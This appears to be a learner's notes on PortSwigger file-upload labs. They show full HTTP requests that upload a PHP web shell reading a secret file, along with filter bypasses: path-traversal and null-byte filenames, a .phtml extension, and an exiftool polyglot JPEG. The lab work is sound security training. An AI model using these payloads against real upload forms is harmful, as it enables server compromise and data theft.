Published on

File Upload Labs Overview

File Upload

Current Lab

https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-race-condition

Stuck on this one. Maybe will have to send request bulk ( via a script or intruder ) to exploit race condition.

Completed Labs

  1. Lab : https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

Request is :

POST /my-account/avatar HTTP/1.1
Host: ac001ff71f84373ec0250aad009900f6.web-security-academy.net
Cookie: session=oNfNC6EV6EeWRhPFR20s8YFSNB1vhCIY
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac001ff71f84373ec0250aad009900f6.web-security-academy.net/my-account
Content-Type: multipart/form-data; boundary=---------------------------54678472011940128371129110003
Content-Length: 580
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

-----------------------------54678472011940128371129110003
Content-Disposition: form-data; name="avatar"; filename="index.php"
Content-Type: text/plain

<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>
-----------------------------54678472011940128371129110003
Content-Disposition: form-data; name="user"

wiener
-----------------------------54678472011940128371129110003
Content-Disposition: form-data; name="csrf"

CyWcDOIewMR1vVCz9Z5SyAIUvX635o7I
-----------------------------54678472011940128371129110003--
Untitled
  1. Lab : https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-content-type-restriction-bypass

Request is same as before

Here we don't change content type and we just upload a file with php extension

Response

Untitled

  1. Lab https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-path-traversal

Request is :

POST /my-account/avatar HTTP/1.1
Host: ac741f831fb332fcc08fcbde003e00fb.web-security-academy.net
Cookie: session=0foxB7Zs6s6U7kHmBeP4q6Je9t7CNn4R
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac741f831fb332fcc08fcbde003e00fb.web-security-academy.net/my-account
Content-Type: multipart/form-data; boundary=---------------------------16141849379546297572049735286
Content-Length: 582
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

-----------------------------16141849379546297572049735286
Content-Disposition: form-data; name="avatar"; filename="..%2f62.php"
Content-Type: image/jpeg

<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>
-----------------------------16141849379546297572049735286
Content-Disposition: form-data; name="user"

wiener
-----------------------------16141849379546297572049735286
Content-Disposition: form-data; name="csrf"

o9jIgJxyGwddrZnTAle7fiiafGj20cEu
-----------------------------16141849379546297572049735286--

Response is :

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 04:55:05 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 132

The file avatars/../62.php has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>

File content is

Untitled

  1. Lab https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-extension-blacklist-bypass

file extension php is blacklisted so i used phtml from this site

the most important part of request is below

Content-Disposition: form-data; name="avatar"; filename="p.phtml"
Content-Type: image/jpeg

<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>

the file gets uploaded easily

and the result is

Untitled

  1. Lab https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-obfuscated-file-extension

The backend only takes png or jpg extension files hence we can't upload files ending with php extension. Hence we used null byte to ignore jpg extension the filename is p.php%00.jpg

Request is

Content-Disposition: form-data; name="avatar"; filename="p.php%00.jpg"
Content-Type: image/jpeg

<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>
  1. Lab https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-polyglot-web-shell-upload

So here the backend reads the incoming file and tell whether its a valid jepg or png.

  1. We used exiftool to add php code in jpeg file
./exiftool  -Comment='<?php $path = "/home/carlos/secret"; $fileContent = file_get_contents($path); echo $fileContent; echo "hey wassup" ?>' ../test.jpg
  1. Then we uploaded the file as test.php
  2. Now when you go to files/avatars/test.php then we see the following response

Untitled

Here it hard to find our required output. I did put "hey wassup" so that I can search it but the browser is not searching. Eventually I was able to find it.

Untitled

The secret key is M2eMeYXz2bsSAEfwRNsLim3vILBtloiY and not wM.... I had to put it multiple times till I got the correct one. Maybe add a known string like hey wassup before and after the required value.